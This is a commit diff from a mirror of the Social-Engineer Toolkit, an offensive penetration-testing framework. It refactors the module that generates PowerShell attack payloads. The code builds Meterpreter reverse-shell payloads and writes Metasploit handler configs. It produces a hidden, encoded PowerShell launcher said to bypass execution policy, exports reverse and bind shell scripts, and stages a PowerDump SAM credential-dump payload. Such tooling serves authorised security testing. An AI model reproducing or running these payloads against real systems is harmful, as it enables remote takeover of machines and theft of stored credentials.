mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-11-27 06:50:18 +00:00
Merge branch 'master' of https://github.com/trustedsec/social-engineer-toolkit
This commit is contained in:
commit
5bc6018e84
6 changed files with 269 additions and 284 deletions
|
@ -10,6 +10,7 @@ import base64
|
|||
from src.core.setcore import *
|
||||
from src.core.menu.text import *
|
||||
from src.core.dictionaries import *
|
||||
from src.payloads.powershell.prep import prep_powershell_payload
|
||||
|
||||
try:
|
||||
if len(check_options("IPADDR=")) > 2:
|
||||
|
@ -599,10 +600,7 @@ try:
|
|||
if setshell_counter == 0:
|
||||
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
|
||||
if os.path.isfile("%s/web_clone/index.html" % (setdir)):
|
||||
try:
|
||||
reload(src.payloads.powershell.prep)
|
||||
except:
|
||||
import src.payloads.powershell.prep
|
||||
prep_powershell_payload()
|
||||
if os.path.isfile("%s/x86.powershell" % (setdir)):
|
||||
fileopen1 = open(
|
||||
"%s/x86.powershell" % (setdir), "r")
|
||||
|
|
|
@ -8,6 +8,7 @@ import subprocess
|
|||
import time
|
||||
import src.core.setcore as core
|
||||
import impacket.tds as tds
|
||||
from src.payloads.powershell.prep import prep_powershell_payload
|
||||
|
||||
#from src.core.payloadgen import create_payloads
|
||||
|
||||
|
@ -172,28 +173,25 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
|
||||
if choice1 == "1":
|
||||
web_path = None
|
||||
try:
|
||||
core.module_reload(create_payloads)
|
||||
except:
|
||||
import src.core.payloadgen.create_payloads
|
||||
prep_powershell_payload()
|
||||
|
||||
# if we are using a SET interactive shell payload then we need to make
|
||||
# the path under web_clone versus ~./set
|
||||
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
|
||||
web_path = os.path.join(core.setdir + "web_clone")
|
||||
# then we are using metasploit
|
||||
else:
|
||||
if operating_system == "posix":
|
||||
web_path = core.setdir
|
||||
# if it isn't there yet
|
||||
if not os.path.isfile(core.setdir + "1msf.exe"):
|
||||
# move it then
|
||||
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
|
||||
(core.setdir, core.setdir), shell=True).wait()
|
||||
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
|
||||
(core.setdir, core.setdir), shell=True).wait()
|
||||
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
|
||||
(core.setdir, core.setdir), shell=True).wait()
|
||||
# if we are using a SET interactive shell payload then we need to make
|
||||
# the path under web_clone versus ~./set
|
||||
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
|
||||
web_path = os.path.join(core.setdir + "web_clone")
|
||||
# then we are using metasploit
|
||||
else:
|
||||
if operating_system == "posix":
|
||||
web_path = core.setdir
|
||||
# if it isn't there yet
|
||||
if not os.path.isfile(core.setdir + "1msf.exe"):
|
||||
# move it then
|
||||
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
|
||||
(core.setdir, core.setdir), shell=True).wait()
|
||||
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
|
||||
(core.setdir, core.setdir), shell=True).wait()
|
||||
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
|
||||
(core.setdir, core.setdir), shell=True).wait()
|
||||
payload_filename = os.path.join(web_path + "1msf.exe")
|
||||
|
||||
with open(payload_filename, "rb") as fileopen:
|
||||
|
|
|
@ -8,6 +8,7 @@ import os
|
|||
import subprocess
|
||||
|
||||
import src.core.setcore as core
|
||||
from src.payloads.powershell.prep import prep_powershell_payload
|
||||
|
||||
# Py2/3 compatibility
|
||||
# Python3 renamed raw_input to input
|
||||
|
@ -74,10 +75,7 @@ try:
|
|||
core.update_options("POWERSHELL_SOLO=ON")
|
||||
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
|
||||
|
||||
try:
|
||||
core.module_reload(src.payloads.powershell.prep)
|
||||
except:
|
||||
import src.payloads.powershell.prep
|
||||
prep_powershell_payload()
|
||||
|
||||
# create the directory if it does not exist
|
||||
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
|
||||
|
|
|
@ -1,203 +1,199 @@
|
|||
#!/usr/bin/env python
|
||||
import sys
|
||||
import subprocess
|
||||
import re
|
||||
# coding=utf-8
|
||||
import os
|
||||
import re
|
||||
import time
|
||||
from src.core.setcore import *
|
||||
|
||||
# grab stage encoding flag
|
||||
stage_encoding = check_config("STAGE_ENCODING=").lower()
|
||||
if stage_encoding == "off":
|
||||
stage_encoding = "false"
|
||||
else:
|
||||
stage_encoding = "true"
|
||||
import src.core.setcore as core
|
||||
|
||||
# check to see if we are just generating powershell code
|
||||
powershell_solo = check_options("POWERSHELL_SOLO")
|
||||
# Py2/3 compatibility
|
||||
# Python3 renamed raw_input to input
|
||||
try:
|
||||
input = raw_input
|
||||
except NameError:
|
||||
pass
|
||||
|
||||
# check if port is there
|
||||
port = check_options("PORT=")
|
||||
def prep_powershell_payload():
|
||||
|
||||
# check if we are using auto_migrate
|
||||
auto_migrate = check_config("AUTO_MIGRATE=")
|
||||
|
||||
# check if we are using pyinjection
|
||||
pyinjection = check_options("PYINJECTION=")
|
||||
if pyinjection == "ON":
|
||||
# check to ensure that the payload options were specified right
|
||||
if os.path.isfile(setdir + "/payload_options.shellcode"):
|
||||
pyinjection = "on"
|
||||
print_status(
|
||||
"Multi/Pyinjection was specified. Overriding config options.")
|
||||
# grab stage encoding flag
|
||||
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
|
||||
if stage_encoding == "off":
|
||||
stage_encoding = "false"
|
||||
else:
|
||||
pyinjection = "off"
|
||||
stage_encoding = "true"
|
||||
|
||||
# grab ipaddress
|
||||
if check_options("IPADDR=") != 0:
|
||||
ipaddr = check_options("IPADDR=")
|
||||
else:
|
||||
ipaddr = input("Enter the ipaddress for the reverse connection: ")
|
||||
update_options("IPADDR=" + ipaddr)
|
||||
# check to see if we are just generating powershell code
|
||||
powershell_solo = core.check_options("POWERSHELL_SOLO")
|
||||
|
||||
# check to see if we are using multi powershell injection
|
||||
multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower()
|
||||
# check if port is there
|
||||
port = core.check_options("PORT=")
|
||||
|
||||
# turn off multi injection if pyinjection is specified
|
||||
if pyinjection == "on":
|
||||
multi_injection = "off"
|
||||
# check if we are using auto_migrate
|
||||
auto_migrate = core.check_config("AUTO_MIGRATE=")
|
||||
|
||||
# check what payloads we are using
|
||||
powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
|
||||
# check if we are using pyinjection
|
||||
pyinjection = core.check_options("PYINJECTION=")
|
||||
if pyinjection == "ON":
|
||||
# check to ensure that the payload options were specified right
|
||||
if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")):
|
||||
pyinjection = "on"
|
||||
core.print_status("Multi/Pyinjection was specified. Overriding config options.")
|
||||
else:
|
||||
pyinjection = "off"
|
||||
|
||||
# if we specified a hostname then default to reverse https/http
|
||||
if validate_ip(ipaddr) == False:
|
||||
powershell_inject_x86 = "windows/meterpreter/reverse_http"
|
||||
# grab ipaddress
|
||||
if core.check_options("IPADDR=") != 0:
|
||||
ipaddr = core.check_options("IPADDR=")
|
||||
else:
|
||||
ipaddr = input("Enter the ipaddress for the reverse connection: ")
|
||||
core.update_options("IPADDR=" + ipaddr)
|
||||
|
||||
# prompt what port to listen on for powershell then make an append to the current
|
||||
# metasploit answer file
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
# if we have multi injection on, don't worry about these
|
||||
if multi_injection != "on":
|
||||
if pyinjection == "off":
|
||||
print_status(
|
||||
"POWERSHELL_INJECTION is set to ON with multi-pyinjector")
|
||||
port = input(setprompt(
|
||||
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
|
||||
if port == "":
|
||||
# check to see if we are using multi powershell injection
|
||||
multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower()
|
||||
|
||||
# turn off multi injection if pyinjection is specified
|
||||
if pyinjection == "on":
|
||||
multi_injection = "off"
|
||||
|
||||
# check what payloads we are using
|
||||
powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
|
||||
|
||||
# if we specified a hostname then default to reverse https/http
|
||||
if not core.validate_ip(ipaddr):
|
||||
powershell_inject_x86 = "windows/meterpreter/reverse_http"
|
||||
|
||||
# prompt what port to listen on for powershell then make an append to the current
|
||||
# metasploit answer file
|
||||
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
|
||||
# if we have multi injection on, don't worry about these
|
||||
if multi_injection != "on" and pyinjection == "off":
|
||||
core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
|
||||
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
|
||||
if not port:
|
||||
port = "443"
|
||||
fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r")
|
||||
data = fileopen.read()
|
||||
with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen:
|
||||
data = fileopen.read()
|
||||
match = re.search(port, data)
|
||||
if not match:
|
||||
filewrite = open(
|
||||
"%s/meta_config_multipyinjector" % (setdir), "a")
|
||||
filewrite.write("\nuse exploit/multi/handler\n")
|
||||
if auto_migrate == "ON":
|
||||
filewrite.write(
|
||||
"set AutoRunScript post/windows/manage/smart_migrate\n")
|
||||
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" %
|
||||
(powershell_inject_x86, ipaddr, port, stage_encoding))
|
||||
filewrite.close()
|
||||
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
|
||||
filewrite.write("\nuse exploit/multi/handler\n")
|
||||
if auto_migrate == "ON":
|
||||
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
|
||||
filewrite.write("set PAYLOAD {0}\n"
|
||||
"set LHOST {1}\n"
|
||||
"set LPORT {2}\n"
|
||||
"set EnableStageEncoding {3}\n"
|
||||
"set ExitOnSession false\n"
|
||||
"exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding))
|
||||
|
||||
# if we have multi injection on, don't worry about these
|
||||
if multi_injection != "on":
|
||||
if pyinjection == "off":
|
||||
# if we have multi injection on, don't worry about these
|
||||
if multi_injection != "on" and pyinjection == "off":
|
||||
# check to see if the meta config multi pyinjector is there
|
||||
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
if check_options("PORT=") != 0:
|
||||
port = check_options("PORT=")
|
||||
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
|
||||
if core.check_options("PORT=") != 0:
|
||||
port = core.check_options("PORT=")
|
||||
# if port.options isnt there then prompt
|
||||
else:
|
||||
port = input(setprompt(
|
||||
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
|
||||
if port == "":
|
||||
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
|
||||
if not port:
|
||||
port = "443"
|
||||
update_options("PORT=" + port)
|
||||
core.update_options("PORT={0}".format(port))
|
||||
|
||||
# turn off multi_injection if we are riding solo from the powershell menu
|
||||
if powershell_solo == "ON":
|
||||
multi_injection = "off"
|
||||
pyinjection = "on"
|
||||
# turn off multi_injection if we are riding solo from the powershell menu
|
||||
if powershell_solo == "ON":
|
||||
multi_injection = "off"
|
||||
pyinjection = "on"
|
||||
|
||||
# if we are using multi powershell injection
|
||||
if multi_injection == "on":
|
||||
if pyinjection == "off":
|
||||
print_status(
|
||||
"Multi-Powershell-Injection is set to ON, this should be sweet...")
|
||||
# if we are using multi powershell injection
|
||||
if multi_injection == "on" and pyinjection == "off":
|
||||
core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")
|
||||
|
||||
# define a base variable
|
||||
x86 = ""
|
||||
# define a base variable
|
||||
x86 = ""
|
||||
|
||||
# specify a list we will use for later
|
||||
multi_injection_x86 = ""
|
||||
|
||||
# here we do some funky loops so we don't need to rewrite the code below
|
||||
if multi_injection == "on":
|
||||
port = check_config("POWERSHELL_MULTI_PORTS=")
|
||||
port = port.split(",")
|
||||
|
||||
if multi_injection == "on":
|
||||
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
|
||||
for ports in port:
|
||||
# dont cycle through if theres a blank
|
||||
if ports != "":
|
||||
print_status(
|
||||
"Generating x86-based powershell injection code for port: %s" % (ports))
|
||||
multi_injection_x86 = multi_injection_x86 + "," + \
|
||||
generate_powershell_alphanumeric_payload(
|
||||
powershell_inject_x86, ipaddr, ports, x86)
|
||||
|
||||
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
port_check = check_ports(
|
||||
"%s/meta_config_multipyinjector" % (setdir), ports)
|
||||
if port_check == False:
|
||||
filewrite = open(
|
||||
"%s/meta_config_multipyinjector" % (setdir), "a")
|
||||
filewrite.write("\nuse exploit/multi/handler\n")
|
||||
if auto_migrate == "ON":
|
||||
filewrite.write(
|
||||
"set AutoRunScript post/windows/manage/smart_migrate\n")
|
||||
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (
|
||||
powershell_inject_x86, ipaddr, stage_encoding, ports))
|
||||
filewrite.close()
|
||||
|
||||
# if we aren't using multi pyinjector
|
||||
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
# if meta config isn't created yet then create it
|
||||
if not os.path.isfile("%s/meta_config" % (setdir)):
|
||||
filewrite = open("%s/meta_config" % (setdir), "w")
|
||||
filewrite.write("")
|
||||
filewrite.close()
|
||||
port_check = check_ports("%s/meta_config" % (setdir), ports)
|
||||
if port_check == False:
|
||||
filewrite = open("%s/meta_config" % (setdir), "a")
|
||||
filewrite.write("\nuse exploit/multi/handler\n")
|
||||
if auto_migrate == "ON":
|
||||
filewrite.write(
|
||||
"set AutoRunScript post/windows/manage/smart_migrate\n")
|
||||
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (
|
||||
powershell_inject_x86, ipaddr, stage_encoding, ports))
|
||||
filewrite.close()
|
||||
|
||||
# here we do everything if pyinjection or multi pyinjection was specified
|
||||
if pyinjection == "on":
|
||||
# specify a list we will use for later
|
||||
multi_injection_x86 = ""
|
||||
# read in the file we need for parsing
|
||||
fileopen = open(setdir + "/payload_options.shellcode", "r")
|
||||
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
|
||||
payloads = payloads.split(",")
|
||||
# format: payload<space>port
|
||||
for payload in payloads:
|
||||
|
||||
# here we do some funky loops so we don't need to rewrite the code below
|
||||
if multi_injection == "on":
|
||||
port = core.check_config("POWERSHELL_MULTI_PORTS=")
|
||||
port = port.split(",")
|
||||
|
||||
if multi_injection == "on":
|
||||
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
|
||||
for ports in port:
|
||||
# dont cycle through if theres a blank
|
||||
if ports:
|
||||
core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports))
|
||||
multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)
|
||||
|
||||
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
|
||||
port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports)
|
||||
if not port_check:
|
||||
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
|
||||
filewrite.write("\nuse exploit/multi/handler\n")
|
||||
if auto_migrate == "ON":
|
||||
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
|
||||
filewrite.write("set PAYLOAD {0}\n"
|
||||
"set LHOST {1}\n"
|
||||
"set EnableStageEncoding {2}\n"
|
||||
"set LPORT {3}\n"
|
||||
"set ExitOnSession false\n"
|
||||
"exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))
|
||||
|
||||
# if we aren't using multi pyinjector
|
||||
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
|
||||
# if meta config isn't created yet then create it
|
||||
if not os.path.isfile():
|
||||
with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite:
|
||||
filewrite.write("")
|
||||
port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports)
|
||||
if not port_check:
|
||||
with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite:
|
||||
filewrite.write("\nuse exploit/multi/handler\n")
|
||||
if auto_migrate == "ON":
|
||||
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
|
||||
filewrite.write("set PAYLOAD {0}\n"
|
||||
"set LHOST {1}\n"
|
||||
"set EnableStageEncoding {2}\n"
|
||||
"set ExitOnSession false\n"
|
||||
"set LPORT {3}\n"
|
||||
"exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))
|
||||
|
||||
# here we do everything if pyinjection or multi pyinjection was specified
|
||||
if pyinjection == "on":
|
||||
injections = []
|
||||
# read in the file we need for parsing
|
||||
with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen:
|
||||
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
|
||||
payloads = payloads.split(",")
|
||||
# format: payload<space>port
|
||||
payload = payload.split(" ")
|
||||
powershell_inject_x86 = payload[0]
|
||||
port = payload[1]
|
||||
print_status("Generating x86-based powershell injection code...")
|
||||
multi_injection_x86 = multi_injection_x86 + "," + \
|
||||
generate_powershell_alphanumeric_payload(
|
||||
powershell_inject_x86, ipaddr, port, x86)
|
||||
for payload in payloads:
|
||||
# format: payload<space>port
|
||||
payload = payload.split(" ")
|
||||
powershell_inject_x86 = payload[0]
|
||||
port = payload[1]
|
||||
core.print_status("Generating x86-based powershell injection code...")
|
||||
injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86))
|
||||
multi_injection_x86 = ",".join(injections)
|
||||
|
||||
# if its turned to off
|
||||
if multi_injection == "off":
|
||||
if pyinjection == "off":
|
||||
print_status("Generating x86-based powershell injection code...")
|
||||
x86 = generate_powershell_alphanumeric_payload(
|
||||
powershell_inject_x86, ipaddr, port, x86)
|
||||
# if its turned to off
|
||||
if multi_injection == "off" and pyinjection == "off":
|
||||
core.print_status("Generating x86-based powershell injection code...")
|
||||
x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)
|
||||
|
||||
# if we are specifying multi powershell injection
|
||||
if multi_injection == "on" or pyinjection == "on":
|
||||
x86 = multi_injection_x86[1:] # remove comma at beginning
|
||||
# if we are specifying multi powershell injection
|
||||
if multi_injection == "on" or pyinjection == "on":
|
||||
x86 = multi_injection_x86[1:] # remove comma at beginning
|
||||
|
||||
# check to see if we want to display the powershell command to the user
|
||||
verbose = check_config("POWERSHELL_VERBOSE=")
|
||||
if verbose.lower() == "on":
|
||||
print_status("Printing the x86 based encoded code...")
|
||||
time.sleep(3)
|
||||
print(x86)
|
||||
# check to see if we want to display the powershell command to the user
|
||||
verbose = core.check_config("POWERSHELL_VERBOSE=")
|
||||
if verbose.lower() == "on":
|
||||
core.print_status("Printing the x86 based encoded code...")
|
||||
time.sleep(3)
|
||||
print(x86)
|
||||
|
||||
filewrite = open("%s/x86.powershell" % (setdir), "w")
|
||||
filewrite.write(x86)
|
||||
filewrite.close()
|
||||
print_status("Finished generating powershell injection bypass.")
|
||||
print_status("Encoded to bypass execution restriction policy...")
|
||||
with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite:
|
||||
filewrite.write(x86)
|
||||
core.print_status("Finished generating powershell injection bypass.")
|
||||
core.print_status("Encoded to bypass execution restriction policy...")
|
||||
|
|
|
@ -0,0 +1 @@
|
|||
# coding=utf-8
|
|
@ -1,145 +1,139 @@
|
|||
#!/usr/bin/python
|
||||
# coding=utf-8
|
||||
#
|
||||
#
|
||||
# handle powershell payloads and get them ready
|
||||
#
|
||||
#
|
||||
#
|
||||
from src.core.setcore import *
|
||||
import os
|
||||
import shutil
|
||||
import subprocess
|
||||
|
||||
import src.core.setcore as core
|
||||
from src.core.menu import text
|
||||
from src.payloads.powershell.prep import prep_powershell_payload
|
||||
|
||||
me = mod_name()
|
||||
# Py2/3 compatibility
|
||||
# Python3 renamed raw_input to input
|
||||
try:
|
||||
input = raw_input
|
||||
except NameError:
|
||||
pass
|
||||
|
||||
debug_msg(me, "printing 'text.powershell menu'", 5)
|
||||
show_powershell_menu = create_menu(text.powershell_text, text.powershell_menu)
|
||||
powershell_menu_choice = input(setprompt(["29"], ""))
|
||||
core.debug_msg(core.mod_name(), "printing 'text.powershell menu'", 5)
|
||||
|
||||
show_powershell_menu = core.create_menu(text.powershell_text, text.powershell_menu)
|
||||
powershell_menu_choice = input(core.setprompt(["29"], ""))
|
||||
|
||||
if powershell_menu_choice != "99":
|
||||
# specify ipaddress of reverse listener
|
||||
ipaddr = grab_ipaddress()
|
||||
update_options("IPADDR=" + ipaddr)
|
||||
ipaddr = core.grab_ipaddress()
|
||||
core.update_options("IPADDR=" + ipaddr)
|
||||
|
||||
# if we select alphanumeric shellcode
|
||||
if powershell_menu_choice == "1":
|
||||
port = input(
|
||||
setprompt(["29"], "Enter the port for the reverse [443]"))
|
||||
if port == "":
|
||||
port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
|
||||
if not port:
|
||||
port = "443"
|
||||
update_options("PORT=" + port)
|
||||
update_options("POWERSHELL_SOLO=ON")
|
||||
print_status(
|
||||
"Prepping the payload for delivery and injecting alphanumeric shellcode...")
|
||||
core.update_options("PORT=" + port)
|
||||
core.update_options("POWERSHELL_SOLO=ON")
|
||||
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
|
||||
|
||||
filewrite = open(setdir + "/payload_options.shellcode", "w")
|
||||
filewrite.write("windows/meterpreter/reverse_tcp " + port + ",")
|
||||
filewrite.close()
|
||||
with open(core.setdir + "/payload_options.shellcode", "w") as filewrite:
|
||||
filewrite.write("windows/meterpreter/reverse_tcp {},".format(port))
|
||||
|
||||
try:
|
||||
module_reload(src.payloads.powershell.prep)
|
||||
except:
|
||||
import src.payloads.powershell.prep
|
||||
prep_powershell_payload()
|
||||
|
||||
# create the directory if it does not exist
|
||||
if not os.path.isdir(setdir + "/reports/powershell"):
|
||||
os.makedirs(setdir + "/reports/powershell")
|
||||
if not os.path.isdir(core.setdir + "/reports/powershell"):
|
||||
os.makedirs(core.setdir + "/reports/powershell")
|
||||
|
||||
# here we format everything for us
|
||||
x86 = open(setdir + "/x86.powershell", "r")
|
||||
x86 = x86.read()
|
||||
with open(core.setdir + "/x86.powershell") as fileopen:
|
||||
x86 = fileopen.read()
|
||||
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
|
||||
print_status(
|
||||
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
|
||||
filewrite = open(
|
||||
setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||
filewrite.write(x86)
|
||||
filewrite.close()
|
||||
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/")))
|
||||
with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
|
||||
filewrite.write(x86)
|
||||
|
||||
choice = yesno_prompt(
|
||||
"0", "Do you want to start the listener now [yes/no]: ")
|
||||
choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ")
|
||||
if choice == 'NO':
|
||||
pass
|
||||
|
||||
# if we want to start the listener
|
||||
if choice == 'YES':
|
||||
filewrite = open(setdir + "/reports/powershell/powershell.rc", "w")
|
||||
filewrite.write(
|
||||
"use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port))
|
||||
filewrite.close()
|
||||
msf_path = meta_path()
|
||||
subprocess.Popen("%smsfconsole -r %s/reports/powershell/powershell.rc" %
|
||||
(msf_path, setdir), shell=True).wait()
|
||||
with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite:
|
||||
filewrite.write("use multi/handler\n"
|
||||
"set payload windows/meterpreter/reverse_tcp\n"
|
||||
"set LPORT {0}\n"
|
||||
"set LHOST 0.0.0.0\n"
|
||||
"set ExitOnSession false\n"
|
||||
"exploit -j".format(port))
|
||||
|
||||
print_status(
|
||||
"Powershell files can be found under %s/reports/powershell/" % (setdir))
|
||||
return_continue()
|
||||
msf_path = core.meta_path()
|
||||
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
|
||||
os.path.join(core.setdir, "reports/powershell/powershell.rc")),
|
||||
shell=True).wait()
|
||||
|
||||
core.print_status("Powershell files can be found under {0}".format(os.path.join(core.setdir, "reports/powershell")))
|
||||
core.return_continue()
|
||||
|
||||
# if we select powershell reverse shell
|
||||
if powershell_menu_choice == "2":
|
||||
|
||||
# prompt for IP address and port
|
||||
port = input(
|
||||
setprompt(["29"], "Enter the port for listener [443]"))
|
||||
port = input(core.setprompt(["29"], "Enter the port for listener [443]"))
|
||||
# default to 443
|
||||
if port == "":
|
||||
if not port:
|
||||
port = "443"
|
||||
# open the reverse shell up
|
||||
print_status("Rewriting the powershell reverse shell with options")
|
||||
fileopen = open("src/powershell/reverse.powershell", "r")
|
||||
data = fileopen.read()
|
||||
core.print_status("Rewriting the powershell reverse shell with options")
|
||||
with open("src/powershell/reverse.powershell") as fileopen:
|
||||
data = fileopen.read()
|
||||
data = data.replace("IPADDRHERE", ipaddr)
|
||||
data = data.replace("PORTHERE", port)
|
||||
print_status(
|
||||
"Exporting the powershell stuff to %s/reports/powershell" % (setdir))
|
||||
core.print_status("Exporting the powershell stuff to {0}".format(os.path.join(core.setdir, "reports/powershell")))
|
||||
# create the directory if it does not exist
|
||||
if not os.path.isdir(setdir + "/reports/powershell"):
|
||||
os.makedirs(setdir + "/reports/powershell")
|
||||
filewrite = open(
|
||||
setdir + "/reports/powershell/powershell.reverse.txt", "w")
|
||||
filewrite.write(data)
|
||||
filewrite.close()
|
||||
if not os.path.isdir(core.setdir + "/reports/powershell"):
|
||||
os.makedirs(core.setdir + "/reports/powershell")
|
||||
with open(core.setdir + "/reports/powershell/powershell.reverse.txt", "w") as filewrite:
|
||||
filewrite.write(data)
|
||||
|
||||
choice = yesno_prompt("0", "Do you want to start a listener [yes/no]")
|
||||
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]")
|
||||
if choice == "NO":
|
||||
print_status(
|
||||
"Have netcat or standard socket listener on port %s" % (port))
|
||||
core.print_status("Have netcat or standard socket listener on port {0}".format(port))
|
||||
if choice == "YES":
|
||||
socket_listener(port)
|
||||
core.socket_listener(port)
|
||||
|
||||
return_continue()
|
||||
core.return_continue()
|
||||
|
||||
# if we select powershell bind shell
|
||||
if powershell_menu_choice == "3":
|
||||
|
||||
port = input(
|
||||
setprompt(["29"], "Enter the port for listener [443]"))
|
||||
port = input(core.setprompt(["29"], "Enter the port for listener [443]"))
|
||||
|
||||
# open file
|
||||
fileopen = open("src/powershell/bind.powershell", "r")
|
||||
data = fileopen.read()
|
||||
with open("src/powershell/bind.powershell") as fileopen:
|
||||
data = fileopen.read()
|
||||
data = data.replace("PORTHERE", port)
|
||||
# create the directory if it does not exist
|
||||
if not os.path.isdir(setdir + "/reports/powershell"):
|
||||
os.makedirs(setdir + "/reports/powershell")
|
||||
filewrite = open(
|
||||
setdir + "/reports/powershell/powershell.bind.txt", "w")
|
||||
filewrite.write(data)
|
||||
filewrite.close()
|
||||
print_status(
|
||||
"The powershell program has been exported to %s/reports/powershell/" % (setdir))
|
||||
return_continue()
|
||||
if not os.path.isdir(core.setdir + "/reports/powershell"):
|
||||
os.makedirs(core.setdir + "/reports/powershell")
|
||||
with open(core.setdir + "/reports/powershell/powershell.bind.txt", "w") as filewrite:
|
||||
filewrite.write(data)
|
||||
core.print_status("The powershell program has been exported to {0}".format(os.path.join(core.setdir, "reports/powershell/")))
|
||||
core.return_continue()
|
||||
|
||||
# if we select powershell powerdump SAM dump
|
||||
if powershell_menu_choice == "4":
|
||||
|
||||
# create the directory if it does not exist
|
||||
if not os.path.isdir(setdir + "/reports/powershell"):
|
||||
os.makedirs(setdir + "/reports/powershell")
|
||||
if not os.path.isdir(core.setdir + "/reports/powershell"):
|
||||
os.makedirs(core.setdir + "/reports/powershell")
|
||||
# copy file
|
||||
if os.path.isfile("src/powershell/powerdump.encoded"):
|
||||
shutil.copyfile("src/powershell/powerdump.encoded",
|
||||
setdir + "/reports/powershell/powerdump.encoded.txt")
|
||||
print_status(
|
||||
"The powershell program has been exported to %s/reports/powershell/" % (setdir))
|
||||
print_status(
|
||||
"Note with PowerDump -- You MUST be running as SYSTEM when executing.")
|
||||
return_continue()
|
||||
shutil.copyfile("src/powershell/powerdump.encoded", core.setdir + "/reports/powershell/powerdump.encoded.txt")
|
||||
core.print_status("The powershell program has been exported to {}".format(os.path.join(core.setdir, "reports/powershell")))
|
||||
core.print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.")
|
||||
core.return_continue()
|
||||
|
|
Loading…
Reference in a new issue